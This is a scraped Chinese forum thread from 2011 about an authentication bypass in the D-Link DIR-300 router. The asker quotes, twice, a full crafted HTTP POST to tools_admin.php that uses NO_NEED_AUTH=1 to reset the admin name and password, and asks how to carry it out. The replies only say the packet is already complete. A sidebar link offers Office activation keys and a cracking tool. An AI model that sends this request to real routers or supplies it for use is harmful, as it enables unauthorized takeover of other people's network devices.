怎样发送特制的HTTP POST请求?
时间:2011-05-15
来源:互联网
D-Link DIR-300是一款无线路由器设备。攻击者在访问D-Link DIR-300时,可以利用漏洞绕过验证进行管理配置。控制面板脚本tools_admin.php允许攻击者更改管理员名字,密码和其他变量,未授权攻击者可以发送特制的HTTP POST请求更改这些参数:
POST http://192.168.1.2:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0
ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUT H=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
比如 路由器的管理ip是 192.168.1.2,具体怎么实施呢?
POST http://192.168.1.2:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0
ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUT H=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
比如 路由器的管理ip是 192.168.1.2,具体怎么实施呢?
作者: bezu 发布时间: 2011-05-15
上面的数据包已经再清楚不过了
作者: WL佳佳 发布时间: 2011-05-16
既然要POST的数据都有了,还想要什么
作者: WL佳佳 发布时间: 2011-05-16
相关阅读 更多
热门阅读
-
office 2019专业增强版最新2021版激活秘钥/序列号/激活码推荐 附激活工具
阅读:74
-
如何安装mysql8.0
阅读:31
-
Word快速设置标题样式步骤详解
阅读:28
-
20+道必知必会的Vue面试题(附答案解析)
阅读:37
-
HTML如何制作表单
阅读:22
-
百词斩可以改天数吗?当然可以,4个步骤轻松修改天数!
阅读:31
-
ET文件格式和XLS格式文件之间如何转化?
阅读:24
-
react和vue的区别及优缺点是什么
阅读:121
-
支付宝人脸识别如何关闭?
阅读:21
-
腾讯微云怎么修改照片或视频备份路径?
阅读:28
